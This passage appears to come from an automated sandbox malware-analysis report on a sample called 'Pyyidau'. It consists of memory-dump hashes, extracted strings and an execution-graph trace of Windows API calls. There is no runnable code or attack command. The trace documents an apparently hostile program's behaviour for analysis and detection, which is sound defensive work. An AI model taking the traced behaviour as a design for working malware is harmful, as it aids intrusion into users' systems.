                                                                                                                        • Opcode ID: d55ef0a55544a09b2d5c98ad1ddfeeec109b53479a28dbf72a6b1152485446b8
                                                                                                                        • Instruction ID: 87c03d50cfa4b9d811d21e6dd8419ffc5c9bab0810238f0deb049529ddf6f803
                                                                                                                        • Opcode Fuzzy Hash: d55ef0a55544a09b2d5c98ad1ddfeeec109b53479a28dbf72a6b1152485446b8
                                                                                                                        • Instruction Fuzzy Hash: FDF03AB4A402588FC790DF18C888A9EB7B1FB8D704F0081D6A40DA7790CB349D80CF14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 598604d9d57a8edc466986be12b8a2582dc71fc44f84f4141ce4599f9340b30a
                                                                                                                        • Instruction ID: 0150357f46e5ba518832fe7c855303c2119ab98c229e1525f0f0c1232e75a975
                                                                                                                        • Opcode Fuzzy Hash: 598604d9d57a8edc466986be12b8a2582dc71fc44f84f4141ce4599f9340b30a
                                                                                                                        • Instruction Fuzzy Hash: 34E0C974E0520CEFCB94DFA9D4416ACFBF5EB49310F10C0AA9818A3350D6359A51DF40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 598604d9d57a8edc466986be12b8a2582dc71fc44f84f4141ce4599f9340b30a
                                                                                                                        • Instruction ID: 029ddbf169b7d8076c67a5107eb6d39ab30d0123ac96e16b35703fb1b31aecd0
                                                                                                                        • Opcode Fuzzy Hash: 598604d9d57a8edc466986be12b8a2582dc71fc44f84f4141ce4599f9340b30a
                                                                                                                        • Instruction Fuzzy Hash: F3E0C974E04208EFCB84DFA8D445A9DFBF5EB48310F10C0AE9818A3351D7359A51DF40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 598604d9d57a8edc466986be12b8a2582dc71fc44f84f4141ce4599f9340b30a
                                                                                                                        • Instruction ID: af43ec32f53b9af351a20e127b43c78afbfc7ed86d3a22e64a03556dda514687
                                                                                                                        • Opcode Fuzzy Hash: 598604d9d57a8edc466986be12b8a2582dc71fc44f84f4141ce4599f9340b30a
                                                                                                                        • Instruction Fuzzy Hash: 35E0C974E04208EFCB54DFA8D44169CFBF5EB48310F10C0AAA818A3350D7359A52DF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 89fc267f3c812fe2297d7df17b983024def80ec0d009ea7b8d5d7c132a6931d4
                                                                                                                        • Instruction ID: 6bbccf269403e91d7262fcb3a871ab3b0fab85faef914f3ed99a98e4e382d2e6
                                                                                                                        • Opcode Fuzzy Hash: 89fc267f3c812fe2297d7df17b983024def80ec0d009ea7b8d5d7c132a6931d4
                                                                                                                        • Instruction Fuzzy Hash: 6DE0C274E04208EFCB84DFA9D4416ACBBF4EB49204F10C0AED818A3350DA76AA42CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 89fc267f3c812fe2297d7df17b983024def80ec0d009ea7b8d5d7c132a6931d4
                                                                                                                        • Instruction ID: cd57fdd182571d3c7e181e95366d9438a6935bd483b37ea2d7da05cea3d758e6
                                                                                                                        • Opcode Fuzzy Hash: 89fc267f3c812fe2297d7df17b983024def80ec0d009ea7b8d5d7c132a6931d4
                                                                                                                        • Instruction Fuzzy Hash: 7CE0C274E04208EFCB84DFA8E4416ACBBF4EB48204F20C4AA9818E3350DA35AA42CF40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cb7a71c1abace64482cf180804914d0ea2095dc8dfe41bf70dd52f94bae52e36
                                                                                                                        • Instruction ID: 5f34afc36f0c19742773538ddafe2fe6eaffc5d7fa87701b7cbd0ea820b02dc8
                                                                                                                        • Opcode Fuzzy Hash: cb7a71c1abace64482cf180804914d0ea2095dc8dfe41bf70dd52f94bae52e36
                                                                                                                        • Instruction Fuzzy Hash: 77E04F7090920CEBCB80EFBCD50929DBBF5AB49305F1080AA990DE3390DB345E54DB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: adf3f7378834847d4aceef55ad65c49aa933cae447c204c8cb5a42b65e8e9db0
                                                                                                                        • Instruction ID: 355774c9b2587e2398d503a4bdabad4423988d1e311789c63b34ff4d8a576f04
                                                                                                                        • Opcode Fuzzy Hash: adf3f7378834847d4aceef55ad65c49aa933cae447c204c8cb5a42b65e8e9db0
                                                                                                                        • Instruction Fuzzy Hash: 7DE0C2753001149FC744EBBCE4488063BEAFB8CA603608069E409C33A4DE30EC01CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3995846b64cab690bf8f68dcaf00e72fde0c3d22d4a92382b24aa5cc63d6007e
                                                                                                                        • Instruction ID: 74b1d97af88b3446d79d04b214852c1a06f6cb95dc8e66458940e158dead30b1
                                                                                                                        • Opcode Fuzzy Hash: 3995846b64cab690bf8f68dcaf00e72fde0c3d22d4a92382b24aa5cc63d6007e
                                                                                                                        • Instruction Fuzzy Hash: 8AE01A34D08108ABC754DF98D4415ACFBB8AB49205F10C0EED85893391CA356E42DF80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ffde05eb2e65ae45785a7e2011983e05b3bcad743204540c7d538318afec222a
                                                                                                                        • Instruction ID: 73341a7fc175517b30a988137c2e8b3137108ec2d38027d9b6a70feaa4f999c0
                                                                                                                        • Opcode Fuzzy Hash: ffde05eb2e65ae45785a7e2011983e05b3bcad743204540c7d538318afec222a
                                                                                                                        • Instruction Fuzzy Hash: C1E0127594110CEBC700EFF9D90079E77A9DF45201F4044AAE504972A1EE355B409BA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 60c7f864d3cf605fb3968965bf540688145dccf316de45c7863abe54c1f7122c
                                                                                                                        • Instruction ID: 623b30200d03d24551d557faa3725ca25098a96531847fdd41aa4d613be3aa6e
                                                                                                                        • Opcode Fuzzy Hash: 60c7f864d3cf605fb3968965bf540688145dccf316de45c7863abe54c1f7122c
                                                                                                                        • Instruction Fuzzy Hash: 02E01274A09108DBCB04DFE4E9415ACFBB5EB45715F10D1DDE80867391CB326E46DB81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 506f35433ec84828c33e5604920f28349a1d3aaea40dc6048bfc4041e1c3bf50
                                                                                                                        • Instruction ID: a23b5797406e300f8aebbc2f48c87880e08839b8df01f57375b7ed4040acee03
                                                                                                                        • Opcode Fuzzy Hash: 506f35433ec84828c33e5604920f28349a1d3aaea40dc6048bfc4041e1c3bf50
                                                                                                                        • Instruction Fuzzy Hash: 48D0E279D16228CACB10CBA5C9407DDFBB4AB0C201F016166D01AA6240E234AA009A40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dca1b524463ef0ddd10aa4c155c486fc43cdfd0c17a89ac40731f5c890204482
                                                                                                                        • Instruction ID: 7c4621f8694f3b2eb7170f342dc0fe5b18c62c79ab689a4962c3975a763de559
                                                                                                                        • Opcode Fuzzy Hash: dca1b524463ef0ddd10aa4c155c486fc43cdfd0c17a89ac40731f5c890204482
                                                                                                                        • Instruction Fuzzy Hash: D8D05B7090510CEFCB40EFB4DA0195EB7B5EF44204B5045E9D40CE7740EB315F049B80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9542cba5878cb27355a15633f7013593f732eccbc8543e1c606bdd537dde7e08
                                                                                                                        • Instruction ID: 3b2dfbbea3215d4c58c26c29bdd51fe244911f8b5798682e597c4f78e36aa9b0
                                                                                                                        • Opcode Fuzzy Hash: 9542cba5878cb27355a15633f7013593f732eccbc8543e1c606bdd537dde7e08
                                                                                                                        • Instruction Fuzzy Hash: EFE08C3180A026CFCB208F09C8087BAB3A1EB00320FA660E5D4186B694CB342C069F40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bc25dd3a8ac33fb824dbb3ac5253bc61960a529fa1e7b29c62bcb7bc789a5096
                                                                                                                        • Instruction ID: 2c4b106198b0c5b7bb5cac1f2a2a6f0399f783d663d49babdd644528bf51c25e
                                                                                                                        • Opcode Fuzzy Hash: bc25dd3a8ac33fb824dbb3ac5253bc61960a529fa1e7b29c62bcb7bc789a5096
                                                                                                                        • Instruction Fuzzy Hash: 7CC08CC99402402ECF043670253C87C1A098B952403A84C86E503E75E0C9588A80D758
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 0-1684325040
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 0-1684325040
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1832849722.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_72a0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$Te^q$Te^q$Te^q
                                                                                                                        • API String ID: 0-3563833378
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1832849722.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_72a0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                        • API String ID: 0-2049395529

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.4%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:32%
                                                                                                                        Total number of Nodes:1004
                                                                                                                        Total number of Limit Nodes:27
_wcschr 55501->55500 55505 b382b3 _wcsupr_s_l_stat 5 API calls 55502->55505 55503->55502 55504 b1a32b LocalAlloc InitializeSecurityDescriptor SetSecurityDescriptorDacl 55503->55504 55506 b1a370 wsprintfW CreateEventW 55504->55506 55507 b1a482 55505->55507 55508 b1a3a5 GetLastError 55506->55508 55509 b1a3cb 55506->55509 55508->55509 55510 b1a3b2 CloseHandle 55508->55510 55509->55506 55511 b1a3d9 55509->55511 55512 b1a3db wsprintfW CreateEventW 55509->55512 55510->55509 55513 b1a40b 6 API calls 55511->55513 55512->55513 55513->55502 55526 b15a70 55513->55526 55515 b3ab26 55514->55515 55516 b3ab6c 55514->55516 55521 b3ab41 55515->55521 55523 b3cfc7 66 API calls __getptd_noexit 55515->55523 55525 b3aab4 77 API calls 2 library calls 55516->55525 55519 b3ab32 55524 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55519->55524 55521->55501 55522 b3ab3d 55522->55501 55523->55519 55524->55522 55525->55521 55527 b15a83 55526->55527 55546 b15120 55527->55546 55529 b15a93 WaitForMultipleObjects 55531 b15b4a 55529->55531 55532 b15adc 55529->55532 55533 b15b95 55531->55533 55535 b15b53 Sleep GetCurrentProcess TerminateProcess 55531->55535 55536 b15b82 55531->55536 55534 b15ae0 WaitForSingleObject 55532->55534 55537 b15b02 ResetEvent 55534->55537 55539 b15af6 55534->55539 55536->55533 55538 b15b87 55536->55538 55562 b155b0 236 API calls 2 library calls 55537->55562 55563 b155b0 236 API calls 2 library calls 55538->55563 55539->55537 55542 b15b19 55544 b15b29 SetEvent WaitForMultipleObjects 55542->55544 55543 b15b92 55543->55533 55544->55534 55545 b15b45 55544->55545 55545->55531 55547 b15160 55546->55547 55548 b1513c GetCurrentProcess 55546->55548 55550 b1522f 55547->55550 55559 b1518e 55547->55559 55564 b097d0 55547->55564 55548->55547 55549 b1514e GetModuleFileNameW 55548->55549 55549->55547 55551 b382b3 _wcsupr_s_l_stat 5 API calls 55550->55551 55553 b15249 55551->55553 55553->55529 55555 b151c7 WideCharToMultiByte 55556 b151f8 _strrchr 55555->55556 55556->55550 55558 
b1521e 55556->55558 55560 b382b3 _wcsupr_s_l_stat 5 API calls 55558->55560 55559->55555 55559->55556 55561 b1522b 55560->55561 55561->55529 55562->55542 55563->55543 55565 b37ca4 _malloc 66 API calls 55564->55565 55566 b097ee 55565->55566 55567 b09820 _memset 55566->55567 55568 b097f7 wsprintfW 55566->55568 55570 b382b3 _wcsupr_s_l_stat 5 API calls 55567->55570 55584 b00c30 187 API calls std::locale::facet::_Facet_Register 55568->55584 55571 b0983d 55570->55571 55571->55559 55572 b14760 GetModuleFileNameW 55571->55572 55573 b147dd 55572->55573 55580 b147a0 std::locale::facet::_Facet_Register 55572->55580 55574 b147e3 LoadLibraryW 55573->55574 55575 b147fd GetModuleHandleW GetProcAddress 55573->55575 55574->55575 55576 b147f2 LoadLibraryW 55574->55576 55577 b1482b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 55575->55577 55578 b1481d 55575->55578 55576->55575 55579 b14857 11 API calls 55577->55579 55578->55579 55581 b382b3 _wcsupr_s_l_stat 5 API calls 55579->55581 55580->55573 55580->55580 55582 b147cf LoadLibraryW 55580->55582 55583 b148df 55581->55583 55582->55573 55583->55559 55584->55567 55585 b3d366 55623 b3dcc0 55585->55623 55587 b3d372 GetStartupInfoW 55588 b3d386 HeapSetInformation 55587->55588 55590 b3d391 55587->55590 55588->55590 55624 b3e97d HeapCreate 55590->55624 55591 b3d3df 55592 b3d3ea 55591->55592 55789 b3d2f6 66 API calls 3 library calls 55591->55789 55625 b42d4e GetModuleHandleW 55592->55625 55595 b3d3f0 55596 b3d3fb __RTC_Initialize 55595->55596 55790 b3d2f6 66 API calls 3 library calls 55595->55790 55650 b3da1b GetStartupInfoW 55596->55650 55600 b3d415 GetCommandLineW 55663 b4a6ad GetEnvironmentStringsW 55600->55663 55604 b3d425 55670 b4a5ff GetModuleFileNameW 55604->55670 55607 b3d43a 55676 b4a3be 55607->55676 55610 b3d440 55611 b3d44b 55610->55611 55793 b3cc6b 66 API calls 3 library calls 55610->55793 55690 b3ca4a 55611->55690 55614 b3d453 55616 b3d45e __wwincmdln 55614->55616 55794 b3cc6b 66 API calls 3 library calls 
55614->55794 55696 b2ddd0 SetUnhandledExceptionFilter GetModuleFileNameW 55616->55696 55618 b3d480 55619 b3d48e 55618->55619 55786 b3cc21 55618->55786 55795 b3cc4d 66 API calls _doexit 55619->55795 55622 b3d493 __commit 55623->55587 55624->55591 55626 b42d62 55625->55626 55627 b42d6b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 55625->55627 55796 b42a21 70 API calls _free 55626->55796 55629 b42db5 TlsAlloc 55627->55629 55632 b42ec4 55629->55632 55633 b42e03 TlsSetValue 55629->55633 55631 b42d67 55631->55595 55632->55595 55633->55632 55634 b42e14 55633->55634 55797 b3c976 EncodePointer EncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 55634->55797 55636 b42e19 EncodePointer EncodePointer EncodePointer EncodePointer 55798 b49158 InitializeCriticalSectionAndSpinCount 55636->55798 55638 b42e58 55639 b42e5c DecodePointer 55638->55639 55640 b42ebf 55638->55640 55642 b42e71 55639->55642 55800 b42a21 70 API calls _free 55640->55800 55642->55640 55643 b45b13 __calloc_crt 66 API calls 55642->55643 55644 b42e87 55643->55644 55644->55640 55645 b42e8f DecodePointer 55644->55645 55646 b42ea0 55645->55646 55646->55640 55647 b42ea4 55646->55647 55799 b42a5e 66 API calls 4 library calls 55647->55799 55649 b42eac GetCurrentThreadId 55649->55632 55651 b45b13 __calloc_crt 66 API calls 55650->55651 55658 b3da39 55651->55658 55652 b3dbe4 GetStdHandle 55659 b3dbae 55652->55659 55653 b45b13 __calloc_crt 66 API calls 55653->55658 55654 b3dc48 SetHandleCount 55655 b3d409 55654->55655 55655->55600 55791 b3cc6b 66 API calls 3 library calls 55655->55791 55656 b3dbf6 GetFileType 55656->55659 55657 b3db2e 55657->55659 55660 b3db65 InitializeCriticalSectionAndSpinCount 55657->55660 55661 b3db5a GetFileType 55657->55661 55658->55653 55658->55655 55658->55657 55658->55659 55659->55652 55659->55654 55659->55656 55662 b3dc1c InitializeCriticalSectionAndSpinCount 55659->55662 55660->55655 55660->55657 55661->55657 55661->55660 55662->55655 55662->55659 55664 b4a6c2 
55663->55664 55665 b4a6be 55663->55665 55801 b45ace 66 API calls _malloc 55664->55801 55665->55604 55668 b4a6e4 _memmove 55669 b4a6eb FreeEnvironmentStringsW 55668->55669 55669->55604 55671 b4a634 _wparse_cmdline 55670->55671 55672 b3d42f 55671->55672 55673 b4a671 55671->55673 55672->55607 55792 b3cc6b 66 API calls 3 library calls 55672->55792 55802 b45ace 66 API calls _malloc 55673->55802 55675 b4a677 _wparse_cmdline 55675->55672 55677 b4a3d6 _wcslen 55676->55677 55679 b4a3ce 55676->55679 55678 b45b13 __calloc_crt 66 API calls 55677->55678 55683 b4a3fa _wcslen 55678->55683 55679->55610 55680 b4a450 55804 b379a7 66 API calls 2 library calls 55680->55804 55682 b45b13 __calloc_crt 66 API calls 55682->55683 55683->55679 55683->55680 55683->55682 55684 b4a476 55683->55684 55687 b4a48d 55683->55687 55803 b3847c 66 API calls __commit 55683->55803 55805 b379a7 66 API calls 2 library calls 55684->55805 55806 b3d649 10 API calls __call_reportfault 55687->55806 55689 b4a499 55689->55610 55691 b3ca58 __IsNonwritableInCurrentImage 55690->55691 55807 b48261 55691->55807 55693 b3ca76 __initterm_e 55695 b3ca97 __IsNonwritableInCurrentImage 55693->55695 55810 b39c97 55693->55810 55695->55614 55697 b2de40 55696->55697 55698 b2de3a GetLastError 55696->55698 55699 b26080 220 API calls 55697->55699 55698->55697 55700 b2de4d 55699->55700 55701 b2ef04 55700->55701 55702 b2f030 208 API calls 55700->55702 55703 b382b3 _wcsupr_s_l_stat 5 API calls 55701->55703 55704 b2de69 55702->55704 55705 b2ef16 55703->55705 55706 b2f030 208 API calls 55704->55706 55705->55618 55707 b2de78 GetUserNameW 55706->55707 55814 afff40 55707->55814 55709 b2de94 55710 b2f030 208 API calls 55709->55710 55711 b2dea6 55710->55711 55829 b25490 LoadLibraryW 55711->55829 55713 b2deab 55842 b39cae 55713->55842 55715 b2decb 55716 b2f030 208 API calls 55715->55716 55717 b2df1c LoadStringW 55716->55717 55851 b2a5b0 55717->55851 55720 b2a5b0 149 API calls 55721 b2df5e 55720->55721 55722 b2a5b0 149 API calls 55721->55722 
55723 b2df6a 55722->55723 55724 b2a5b0 149 API calls 55723->55724 55725 b2df76 55724->55725 55854 b39116 55725->55854 55728 b3ab18 77 API calls 55729 b2e032 55728->55729 55730 b3ab18 77 API calls 55729->55730 55731 b2e077 55730->55731 55862 b2f6d0 GetVersionExW 55731->55862 55733 b2e07f 55734 b2e087 GetPrivateProfileStringW lstrcmpiW 55733->55734 55735 b2e0dd GetModuleFileNameW 55733->55735 55734->55735 55736 b2e0d3 55734->55736 55737 b2e0f6 GetLastError 55735->55737 55738 b2e0fc 55735->55738 55736->55735 55737->55738 55739 b2f030 208 API calls 55738->55739 55740 b2e10d 55739->55740 55741 b2f030 208 API calls 55740->55741 55742 b2e11c 55741->55742 55743 b26080 220 API calls 55742->55743 55744 b2e129 55743->55744 55744->55701 55745 b2e134 55744->55745 55884 b3d09c DeleteFileW 55745->55884 55747 b2e15a 55890 b2b1f0 55747->55890 55749 b2e189 _wcschr 55750 b2e663 55749->55750 55767 b2e84d Sleep 55749->55767 55896 b3a558 85 API calls __toupper_l 55749->55896 55751 b2e705 55750->55751 55753 b2e678 GetCurrentDirectoryW 55750->55753 55758 b2e688 55750->55758 55754 b2f030 208 API calls 55751->55754 55753->55758 55755 b2edc7 55754->55755 55756 b2edd3 PostMessageW 55755->55756 55757 b2ede7 DestroyWindow 55755->55757 55756->55757 55759 b2ee02 55757->55759 55760 b2ef27 55757->55760 55897 b278f0 6 API calls 55758->55897 55766 b39583 std::locale::facet::_Facet_Register 136 API calls 55759->55766 55762 b382b3 _wcsupr_s_l_stat 5 API calls 55760->55762 55764 b2ef34 55762->55764 55763 b2e6ce 55765 b2f030 208 API calls 55763->55765 55764->55618 55769 b2e6e3 55765->55769 55770 b2ee2e 55766->55770 55899 b24420 219 API calls _wcsupr_s_l_stat 55767->55899 55769->55751 55771 b2e6f2 55769->55771 55772 b2ee48 55770->55772 55900 b373d1 99 API calls 7 library calls 55770->55900 55898 b24050 138 API calls 6 library calls 55771->55898 55773 b2ee53 Sleep 55772->55773 55774 b2ee6e 55772->55774 55776 b2f030 208 API calls 55773->55776 55777 b2f030 208 API calls 55774->55777 55781 b2ee68 55776->55781 
